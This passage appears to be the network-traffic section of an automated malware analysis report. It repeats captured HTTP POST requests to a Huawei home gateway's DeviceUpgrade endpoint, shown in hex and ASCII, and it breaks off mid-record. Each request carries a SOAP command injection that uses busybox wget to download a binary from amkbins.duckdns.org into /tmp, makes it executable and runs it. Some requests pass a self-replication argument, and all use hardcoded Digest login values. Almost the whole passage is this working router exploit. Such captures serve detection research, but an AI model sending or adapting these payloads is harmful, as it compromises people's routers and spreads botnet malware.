20 2d 72 20 2f 68 75 61 77 65 69 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 61 6d 6b 3b 20 73 68 20 2f 74 6d 70 2f 2e 61 6d 6b 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/.amk -r /huawei; /bin/busybox chmod 777 /tmp/.amk; sh /tmp/.amk)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 452Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 2e 61 6d 6b 20 2d 72 20 2f 68 75 61 77 65 69 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 61 6d 6b 3b 20 73 68 20 2f 74 6d 70 2f 2e 61 6d 6b 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/.amk -r /huawei; /bin/busybox chmod 777 /tmp/.amk; sh /tmp/.amk)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 452Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 2e 61 6d 6b 20 2d 72 20 2f 68 75 61 77 65 69 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 61 6d 6b 3b 20 73 68 20 2f 74 6d 70 2f 2e 61 6d 6b 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/.amk -r /huawei; /bin/busybox chmod 777 /tmp/.amk; sh /tmp/.amk)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 452Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 2e 61 6d 6b 20 2d 72 20 2f 68 75 61 77 65 69 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 61 6d 6b 3b 20 73 68 20 2f 74 6d 70 2f 2e 61 6d 6b 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/.amk -r /huawei; /bin/busybox chmod 777 /tmp/.amk; sh /tmp/.amk)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 452Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 2e 61 6d 6b 20 2d 72 20 2f 68 75 61 77 65 69 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 61 6d 6b 3b 20 73 68 20 2f 74 6d 70 2f 2e 61 6d 6b 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/.amk -r /huawei; /bin/busybox chmod 777 /tmp/.amk; sh /tmp/.amk)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatu
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope 